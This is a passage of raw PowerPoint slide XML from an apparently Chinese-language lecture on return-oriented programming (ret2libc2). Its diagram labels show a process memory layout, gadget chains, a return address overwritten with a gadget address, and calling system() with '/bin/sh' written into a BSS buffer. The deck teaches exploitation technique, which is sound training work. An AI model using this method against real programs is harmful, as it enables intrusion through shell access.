              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5424639"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631565" y="5687810"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5929372"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10514586" y="5492854"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156960" y="5492854"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156951" y="5492854"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156951" y="5755015"/>
            <a:ext cx="474614" cy="1010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连接符 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514586" y="5756025"/>
            <a:ext cx="474606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连接符 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10989178" y="3010915"/>
            <a:ext cx="0" cy="2744427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箭头连接符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514588" y="3010915"/>
            <a:ext cx="474578" cy="0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文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102045" y="2784110"/>
            <a:ext cx="858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Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102389" y="5545729"/>
            <a:ext cx="858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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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48E567E0-7103-4116-BA78-1A8F51CB386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc2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B41AF5B8-C6F2-F853-7C63-5DFFA99C88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778" y="716395"/>
            <a:ext cx="4762913" cy="1722269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8C162E61-596E-E7E7-193D-DF433E1C91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35068"/>
            <a:ext cx="6340389" cy="739204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26BAAC46-234D-8E16-A020-FA2E64CBC937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="326354" y="2469877"/>
            <a:ext cx="5935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err="1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plt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表中有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system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，可以找到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system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的实际调用地址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8D49561B-5016-E657-0916-79FD5F17CC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448726" y="4004063"/>
            <a:ext cx="59352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没有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system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所需要的参数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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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借助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BSS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段中的变量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buf2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，先在其中写入数据，再从中读取数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="图片 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD2DF7E2-99A3-537E-5D59-AD5D6000F6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349" y="5073778"/>
            <a:ext cx="3154953" cy="312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04434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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631564" y="589958"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1162600"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="1208198"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4525879"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="2870890"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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system()</a:t>
            </a:r>
            <a:endParaRPr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6" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5424639"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631565" y="5687810"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5929372"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10514586" y="5492854"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156960" y="5492854"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156951" y="5492854"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156951" y="5755015"/>
            <a:ext cx="474614" cy="1010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连接符 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514586" y="5756025"/>
            <a:ext cx="474606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连接符 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10989178" y="3010915"/>
            <a:ext cx="0" cy="2744427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箭头连接符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
